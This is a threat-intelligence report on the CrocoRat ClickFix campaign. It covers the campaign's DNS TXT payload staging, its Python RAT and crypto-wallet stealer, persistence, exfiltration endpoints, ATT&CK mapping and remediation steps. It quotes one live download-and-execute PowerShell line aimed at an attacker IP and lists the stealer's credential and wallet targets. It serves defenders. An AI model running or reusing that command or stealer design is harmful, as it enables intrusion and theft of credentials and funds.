Threat reportMalwareTL-2026-3283

CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery and Domain-Aware RAT/Stealer Deployment

highACTIVE

CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery (TL-2026-3283), also tracked as CrocoRat, is a high-severity malware campaign, first published 2026-10-10. It has no confirmed attribution, affects Microsoft Windows (PowerShell and Run dialog), maps to 16 MITRE ATT&CK techniques (T1005, T1027, T1033), and is covered by 9 detection rules and 26 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
16MITRE ATT&CK
Actors
0Not attributed
Detection rules
9SPL · KQL · Sigma
IOCs
26Indicators of compromise

Key facts for TL-2026-3283

Threat ID
TL-2026-3283
Also known as
CrocoRat, CrocoRat 1.0 HTTPS Client
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution confidence
LOW
Motivation
FINANCIAL
Target sectors
enterprise, cryptocurrency, general
Target regions
Global
Detection rules
9
Indicators of compromise
26

Malware and tooling in CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery

Malware and tooling: CrocoRat

How CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery works

Flare reports CrocoRat, a ClickFix-delivered Python-based RAT whose clipboard PowerShell command retrieves its real payload from DNS TXT records on attacker infrastructure. The loader compares USERDOMAIN with COMPUTERNAME: domain-joined hosts receive the RAT with scheduled-task persistence, while standalone hosts receive the RAT plus a stealer for browser credentials, crypto wallets and seed phrases.

CrocoRat is delivered through a ClickFix lure hosted on the typosquatted domain veriffication-redirect[.]com, which displays spoofed Cloudflare verification branding. JavaScript on the page calls navigator.clipboard.writeText() to place a PowerShell command on the victim's clipboard without explicit consent, and the victim is instructed to paste and run it from the Windows Run dialog.

The clipboard command is a small stager: it uses Resolve-DnsName to query a TXT record (-Type TXT) against an explicit external resolver controlled by the attacker (167.17.178.103). The TXT response contains the real second-stage command (iwr https://167.17.178.103/getdata | iex). Staging the payload in DNS keeps the actual download logic out of the clipboard and out of the lure page, which hinders clipboard and web-based forensics. This is a variant of the DNS-based ClickFix technique that Microsoft described in February 2026 with nslookup and ModeloRAT, but Flare reports no named-group link.

The second stage downloads update.zip containing a portable Python runtime and scripts, extracted to C:\ProgramData\App (with dependencies in C:\ProgramData\App\_packages). launcher.py profiles the host by comparing the USERDOMAIN and COMPUTERNAME environment variables. Domain-joined systems receive the RAT only; standalone systems receive the RAT plus a stealer. Execution uses the bundled pythonw.exe so no console window appears. Persistence is a scheduled task named AdvancedIPRun (logon trigger, running pythonw.exe runner.py; reported as running every 15 minutes), and the campaign summary also cites the task name AppUpdatePythonRunner.

The payloads are encrypted: encrypted_client_0.bin (the RAT, identified by the banner 'CrocoRat 1.0 HTTPS Client' and a main_loop() function) is decrypted at runtime by a native AES-GCM module (a .pyd) using a key, nonce and tag fetched by a POST to /get_config on 103.56.84.221:8080 (base64-encoded). Flare could not recover the key, so the RAT's full capabilities are undetermined. The stealer components are encrypted .pyc files (browser stealer and wallet collector). The stealer targets Chrome, Edge and Brave credentials and cookies, 22 wallet families (Atomic, Exodus, MetaMask, Trust Wallet, Ledger, Trezor, Monero, Wasabi, BitPay, Guarda, Coinomi, Phantom, Jaxx, Daedalus, Ronin, Binance, Infinity, Electrum, Solflare, Coinbase, Brave Wallet, OKX) and wallet extensions, and scans TXT, DOCX, ODT, RTF and PDF files for BIP39 seed phrases. Browser theft involves injection into browser processes. Collected data is packaged as data_{hostname}.zip and sent via HTTP POST to attacker endpoints (alterzaf[.]com, 41.216.182.164 for wallet data, and 151.241.99.87 in a later build).

Flare captured samples from late August to late September 2026 (scanner versions V15 to V18). Between builds the operator rotated filenames, changed the encryption key prefix (3d65865f... to a3611622...), removed a character-code obfuscation layer and changed exfiltration endpoints, indicating active maintenance. Code comments are in Russian, leading Flare to assess a Russian-speaking developer or operator environment; no named threat group is associated and Flare notes the code may derive from an earlier internal version, template or malware-as-a-service codebase. No CVE or CVSS is stated in the source; the HIGH severity is an analyst judgment based on enterprise RAT access on domain-joined hosts and wallet theft. File hashes exist in the source only in images and were not extractable.

MITRE ATT&CK techniques used in TL-2026-3283

Collection

T1005 Data from Local System; T1560 Archive Collected Data

Defense Evasion

T1027 Obfuscated Files or Information; T1055.001 Dynamic-link Library Injection; T1140 Deobfuscate/Decode Files or Information; T1564.003 Hidden Window

Discovery

T1033 System Owner/User Discovery; T1082 System Information Discovery

Persistence

T1053.005 Scheduled Task

Execution

T1059.001 PowerShell; T1059.006 Python; T1204.004 Malicious Copy and Paste

Command and Control

T1071.001 Web Protocols; T1071.004 DNS

Credential Access

T1552.001 Credentials In Files; T1555.003 Credentials from Web Browsers

Affected products and versions in CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery

  • Microsoft — Windows (PowerShell and Run dialog)
    Vulnerable versions: Windows endpoints, domain-joined and standalone; no specific version stated

Remediation for CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery

Immediate actions

  • Isolate affected hosts and preserve memory before remediation
  • Block veriffication-redirect.com, alterzaf.com and the listed IP addresses at DNS, proxy and perimeter
  • Export and then remove the AdvancedIPRun and AppUpdatePythonRunner scheduled tasks and the C:\ProgramData\App directory
  • If a wallet recovery phrase may have been accessible, treat the wallet as compromised and move funds to a newly generated wallet
  • Rotate credentials and invalidate browser sessions exposed on affected hosts, from a clean device

Workarounds

  • Restrict outbound DNS to approved internal resolvers
  • Alert on scheduled tasks created by script interpreters shortly after browser activity

Longer-term hardening

  • Train users to recognize ClickFix lures that ask them to paste commands into the Run dialog
  • Enable PowerShell script block logging and alert on Resolve-DnsName TXT queries sent to explicit external resolvers
  • Apply application control to prevent interpreters such as pythonw.exe running from C:\ProgramData, AppData, Temp and Downloads
  • Monitor access to browser profile directories, extension storage and cookie databases by non-browser processes
  • Restrict clipboard-to-Run execution patterns where possible

Timeline of CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery

  • Microsoft Threat Intelligence publicly describes a DNS-based ClickFix variant that uses nslookup to stage a payload and deploy the Python-based ModeloRAT; a related but separately reported technique, not attributed to CrocoRat.
  • Flare captures the first CrocoRat samples (late August 2026; exact day not stated, approximate date used), scanner version V15.
  • Flare captures a later build (late September 2026; exact day not stated, approximate date used) with rotated filenames, a changed encryption key prefix, removed character-code obfuscation and a new exfiltration endpoint (151.241.99.87); scanner versions reach V18.
  • Campaign infrastructure reported taken down in late September 2026 (exact day not stated, approximate date used); the source does not say who removed it.
  • Dark Reading publishes 'ClickFix Attacks Evolve to Better Hide Malicious Payloads', covering the CrocoRat DNS payload delivery technique.
  • Flare reports it could not recover the RAT AES-GCM key: the C2 config server withheld key material from the research environment and roughly 2.1 billion brute-force attempts failed, so full RAT capabilities remain undetermined (main_loop() identified only).
  • Flare (Assaf Morag) publishes 'CrocoRat Adds a New Twist to ClickFix with DNS Payload Delivery', the first public report of the campaign.

Sources cited for CrocoRat ClickFix Campaign Using DNS TXT Payload Delivery

Detection coverage for TL-2026-3283

As of 2026-10-10, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-3283 across Splunk SPL, Microsoft KQL and Sigma, covering 26 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
26 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats